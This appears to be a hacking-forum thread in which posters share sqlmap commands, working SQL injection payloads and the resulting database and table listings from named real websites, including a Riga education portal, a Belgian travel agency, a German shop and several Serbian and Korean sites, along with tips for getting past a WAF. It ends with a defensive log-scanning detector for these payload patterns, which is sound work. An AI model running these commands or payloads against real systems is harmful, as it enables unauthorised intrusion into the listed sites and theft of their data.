
Interesting SQL injections & XSS found

sqlmap -u "https://izglitiba.riga.lv/en/search?s=" --dbs --level 2 --risk 2 --threads=10 --technique=T --random-agent --time-sec=3

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: s=') AND (SELECT 1813 FROM (SELECT(SLEEP(5)))ePcx) AND ('jwsY'='jwsY


available databases [2]:
[*] iksd2017
[*] information_schema


iksd2017: a small part
[01:40:34] [INFO] retrieved: accesskeys
[01:43:44] [INFO] retrieved: activeorders
[01:47:33] [INFO] retrieved: activeorders_seats
[01:51:15] [INFO] retrieved: adminnews
[01:54:54] [INFO] retrieved: athletes
[01:58:56] [INFO] retrieved: banners
[02:02:22] [INFO] retrieved: banners_slides
[02:07:33] [INFO] retrieved: bannerstogroups
[02:13:31] [INFO] retrieved: cited_rulings
[02:20:47] [INFO] retrieved: cited_rulings_to_law
[02:28:02] [INFO] retrieved: court_law
[02:33:11] [INFO] retrieved: court_law_laws
[02:37:47] [INFO] retrieved: court_law_laws_copy
[02:43:31] [INFO] retrieved: court_law_to_law
[02:49:14] [INFO] retrieved: cultureevents
[02:55:48] [INFO] retrieved: cultureevents_togroups
[03:03:51] [INFO] retrieved: cultureeventsfiles
[03:08:18] [INFO] retrieved: cultureeventsgroups
[03:13:02] [INFO] retrieved: cultureeventstogroups
[03:17:51] [INFO] retrieved: deliveryadress
[03:22:34] [INFO] retrieved: deliverytypes
[03:25:28] [INFO] retrieved: discounts
[03:28:33] [INFO] retrieved: educationevents
[03:33:53] [INFO] retrieved: educationevents_togroups
[03:39:39] [INFO] retrieved: educationeventsfiles
[03:43:00] [INFO] retrieved: educationeventsgroups
[03:47:05] [INFO] retrieved: educationseventstogroups
[03:54:00] [INFO] retrieved: etc_law_laws
[04:01:24] [INFO] retrieved: etc_law_lo_law
[04:07:40] [INFO] retrieved: etc_law_to_page
[04:20:47] [INFO] retrieved: etc_law_
[04:23:51] [INFO] retrieved: eventdates
 
Did you just get tired of waiting after that?
 
What can be done about this? I tried both --no-cast and --hex; the database name comes out as gibberish every time.
The database count is also returned at random: sometimes 1-6, sometimes a million.
PS: WAF is Cloudflare, tamper=charencode, -v 3 shows nothing interesting.
(attached screenshot: sqlmap_base.png)
 
Hey, need advice. Found a blind time-based SQL injection. I'm able to retrieve hostname, banner, current database and current user. But not able to retrieve tables or data or check privileges... The current user is administrator and yes it's protected by Cloudflare... Even ghauri is facing the same problem...
 
Well, you can see right in the screenshot that the WAF simply killed you.
 
sqlmap -u "https://izglitiba.riga.lv/en/search?s=" -p s --level 5 --risk 3 -v 3 --skip-waf --random-agent --code=200 --prefix="')" --dbms=mysql --suffix="AND ('jwsY'='jwsY" --dbs --tec=B
Cranked it over to boolean.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: s=') AND 4749=(SELECT (CASE WHEN (4749=4749) THEN 4749 ELSE (SELECT 6424 UNION SELECT 6440) END))AND ('jwsY'='jwsY
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
---


available databases [2]:
[*] iksd2017
[*] information_schema
 
sqlmap -u "https://groepsreizen.herbotsreizen.be/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c&previewID=x" --level=5 --risk=3 --random-agent --dbms=mysql --technique="BET" -p contenthistid -dbs
Code:
[15:14:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18, ColdFusion
back-end DBMS: MySQL >= 5.0.0
current database: 'herbotsreizen-live-202104'
---
Parameter: contenthistid (GET)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: method=processAsyncObject&object=displayregion&contenthistid=x\'' AND GTID_SUBSET(CONCAT(0x717a626271,(SELECT (ELT(7370=7370,1))),0x716a7a6271),7370)-- xwYY&previewID=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: method=processAsyncObject&object=displayregion&contenthistid=x\'' AND (SELECT 6187 FROM (SELECT(SLEEP(5)))PZrH)-- xnEc&previewID=x
---
available databases [15]:
[*] herbotsreizen-crm
[*] herbotsreizen-klantenkaart
[*] herbotsreizen-live
[*] herbotsreizen-live-202104
[*] herbotsreizen_mura_2
[*] information_schema
[*] luceemuratest1
[*] mura-siat-group
[*] mura1
[*] mura2
[*] mysql
[*] paesmans-mura
[*] performance_schema
[*] sys
[*] webbitssystem
 
Code:
POST /index.php?module_id=221&route=module/journal2_super_filter/filters HTTP/1.1
Referer: https://www.panthera-tuningshop.de/
Cookie: PHPSESSID=; language=de-DE; li_nr=1; res_pushed=1; currency=EUR; jrv=2886
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Content-Length: 125
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.panthera-tuningshop.de
Connection: Keep-alive

filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"&path=2138&route=product/category&search=&tag=

sqlmap -r ./sql_inj.txt --level=5 --risk=3 --random-agent --technique='TE' -p 'manufacturer_id' --dbms=mysql --dbs

---
Parameter: manufacturer_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"') AND (SELECT 1836 FROM(SELECT COUNT(*),CONCAT(0x71766b7a71,(SELECT (ELT(1836=1836,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Kbuo&path=2138&route=product/category&search=&tag=

Type: time-based blind
Title: MySQL > 5.0.12 AND time-based blind (heavy query)
Payload: filters=/sort=p.sort_order/order=ASC&full_path=166_2139_2138&manufacturer_id='"') AND 5580=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- cdPZ&path=2138&route=product/category&search=&tag=
---

[INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[INFO] fetching database names
available databases [2]:
[*] gahn3j_panthera
[*] information_schema
 
Code:
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://www.axon.rs/view_product.asp?ItemID=192&gpcid=23&cid=237&scid=2373"
---
Parameter: ItemID (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ItemID=192 AND (SELECT 6061 FROM (SELECT(SLEEP(5)))wlgj)&gpcid=23&cid=237&scid=2373

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: ItemID=-9337 UNION ALL SELECT CONCAT(0x7170786b71,0x694971494b55436370495651626b616b695a63706c7362696d615a62445a4b65587456454f4a4370,0x7162626b71)-- -&gpcid=23&cid=237&scid=2373
---
web server operating system: Windows 10 or 2019 or 2016 or 11 or 2022
web application technology: Microsoft IIS 10.0, ASP, ASP.NET
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [2]:
[*] axon
[*] information_schema
[INFO] fetching tables for databases: 'axon, information_schema'
Database: axon
[33 tables]
+---------------------------------------+
| idgeneration                          |
| item_categories                       |
| item_files                            |
| members                               |
| news_categories                       |
| news_categories_rs                    |
| news_item_files                       |
| news_item_files_rs                    |
| news_main_categories                  |
| news_main_categories_rs               |
| news_subcategories                    |
| news_subcategories_rs                 |
| newsletter_archieve                   |
| newsletter_config                     |
| newsletter_mail_list                  |
| newsletter_templates                  |
| site_members                          |
| tblcatalog                            |
| tblcatalog2                           |
| tblcatalog_23_06_2015                 |
| tblcatalogcategory                    |
| tblcatalogsubcategory                 |
| tblcountries                          |
| tblfpa                                |
| tblgpc                                |
| tblitemsordered                       |
| tblmanufacturers                      |
| tblnm_news                            |
| tblnm_news_rs                         |
| tblorders                             |
| tblprefectures                        |
| tblregions                            |
| tblzones                              |
+---------------------------------------+
 
Code:
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://osbranko.rs/Siteview.asp?ID=11"
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=11) AND 3939=3939 AND (4321=4321
---
[INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2019 or 11 or 10 or 2016 or 2022
web application technology: ASP, ASP.NET, Microsoft IIS 10.0
back-end DBMS: Microsoft Access
 
Code:
sqlmap --random-agent --threads=10 --time-sec=5 --url="https://www.kor.rs/registri_Preduzeca_detalj.asp?ID=100"
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=100 AND 1168=1168

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: ID=100 OR 1464=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
 
sqlmap.py -u "http://www.proficientindustries.in/view-single-news.php?id=[t]" --batch --threads=4 --tamper="xforwardedfor,charencode" --dbms=mysql --dbs

available databases [2]:
[*] information_schema
[*] nsp_proficientin

Database: nsp_proficientin
[15 tables]
+--------------------+
| admin_login |
| admin_users |
| bannerad_td |
| download_album |
| download_master_td |
| event_files_td |
| event_td |
| image_album |
| images_master_td |
| newsletter_td |
| send_email_td |
| short_news |
| video_album |
| videos_master_td |
| websiteinfo_master |
+--------------------+
 
Code:
GET /league_tables_script/league_tables.php?role_type=-1'%20OR%203*2*1=6%20AND%20000599=000599%20--%20&section_type=value&transaction_type=33 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.vccedge.com/
Cookie: AKA_A2=A; PHPSESSID=0bbnl7n44bggmkb304ghgiso9l; zabHMBucket=5b960c73723b4fd98cdfe9986402b1c6; zabUserId=1734628069703zabu0.849318458794271; zft-sdc=isef%3Dtrue-isfr%3Dtrue-source%3Ddirect; zps-tgr-dts=sc%3D2-expAppOnNewSession%3D%5B%5D-pc%3D4-sesst%3D1734628339902; zscadbd831887624ea3817dfe5118b3c805=1734628339895zsc0.5480279344384416
Accept: */*
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Host: www.vccedge.com
Connection: Keep-alive

Code:
python3 sqlmap.py -r request.txt -dbms=mysql --dbs

available databases [2]:
[*] information_schema
[*] live_appdb

448 tables in total. Pasting them all would just take up too much space unnecessarily.
 
Code:
sqlmap.py -u "https://www.druginfo.co.kr/detail/drug_images/proxies/get_json.aspx?count=10&offset=0&ppMainCode=146431ASS&sortBy=proIDStr&sortDir=asc" -p ppMainCode --batch --level=5 --risk=3 --dbms=mssql --random-agent --batch --technique=S --dbs

Code:
---
Parameter: ppMainCode (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: count=10&offset=0&ppMainCode=146431ASS';WAITFOR DELAY '0:0:5'--&sortBy=proIDStr&sortDir=asc
---
[18:04:35] [INFO] testing Microsoft SQL Server
[18:04:35] [INFO] confirming Microsoft SQL Server
[18:04:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 11 or 10 or 2019 or 2016 or 2022
web application technology: Microsoft IIS 10.0, ASP.NET 2.0.50727, ASP.NET
back-end DBMS: Microsoft SQL Server 2016
Traffic seems fucking crazy, but I'm too lazy to crank the stacked queries.
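The payload families recorded across the posts above (SLEEP and WAITFOR DELAY delays, GTID_SUBSET and FLOOR(RAND()) error-based probes, heavy-query COUNT(*) self-joins, boolean tautologies, UNION SELECT) are exactly what a defender should be looking for in web-server access logs. The following is an added example, not code from any poster in this thread: a Python detector that URL-decodes each request's query string, classifies it against those families and runs over constructed sample log lines (the IPs and paths are made up; POST bodies such as the manufacturer_id case are not in access logs and need a WAF or application log instead).

```python
import re
from urllib.parse import unquote_plus

# Signature families observed in this thread, matched against the URL-decoded
# query string. List order determines the order of names returned by classify().
SIGNATURES = [
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("stacked queries (WAITFOR DELAY)", re.compile(r"WAITFOR\s+DELAY\s+'?\d+:\d+:\d+", re.I)),
    ("error-based (GTID_SUBSET)", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I)),
    ("time-based blind (heavy query)",
     re.compile(r"SELECT\s+COUNT\(\*\)\s+FROM\s+(?:INFORMATION_SCHEMA\.\w+|sysusers)\s+(?:AS\s+)?\w+\s*,", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+\(?\s*(\d{2,})\s*=\s*\1\b", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

# Apache/nginx combined log format: client IP, request path, HTTP status code.
LOG_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) ([^ "]+) [^"]*" (\d{3})')

def decode(raw, rounds=2):
    """URL-decode up to `rounds` times so double-encoded or fully %XX-encoded
    (charencode-style tamper) payloads are inspected in clear form."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(query):
    """Return the names of every signature family matched by the decoded query."""
    decoded = decode(query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_access_log(lines):
    """Return (client_ip, status, families) for each line that matches a family."""
    hits = []
    for line in lines:
        m = LOG_RX.match(line)
        if m:
            families = classify(m.group(2))
            if families:
                hits.append((m.group(1), m.group(3), families))
    return hits

# Constructed sample lines (made-up IPs and paths) shaped like the payloads above.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:01:40:34 +0000] "GET /search?s=%27%29+AND+%28SELECT+1813+FROM+%28SELECT%28SLEEP%285%29%29%29ePcx%29+AND+%28%27a%27%3D%27a HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2024:01:40:40 +0000] "GET /product.asp?id=-9337+UNION+ALL+SELECT+CONCAT%280x71,0x69,0x71%29--+- HTTP/1.1" 500 311',
    '198.51.100.2 - - [10/Jan/2024:01:41:02 +0000] "GET /get_json.aspx?code=146431%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 88',
    '198.51.100.9 - - [10/Jan/2024:01:41:10 +0000] "GET /tables.php?role=-1%27%20OR%203*2*1=6%20AND%20000599=000599%20--%20 HTTP/1.1" 200 2048',
    '192.0.2.5 - - [10/Jan/2024:01:41:30 +0000] "GET /search?s=books HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for ip, status, families in scan_access_log(SAMPLE_LOG):
        print(f"{ip} -> HTTP {status}: {', '.join(families)}")
```

Feeding a real combined-format log through scan_access_log groups hits by client IP, which is usually enough to spot a sqlmap run even when a WAF has already answered most of the probes.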
 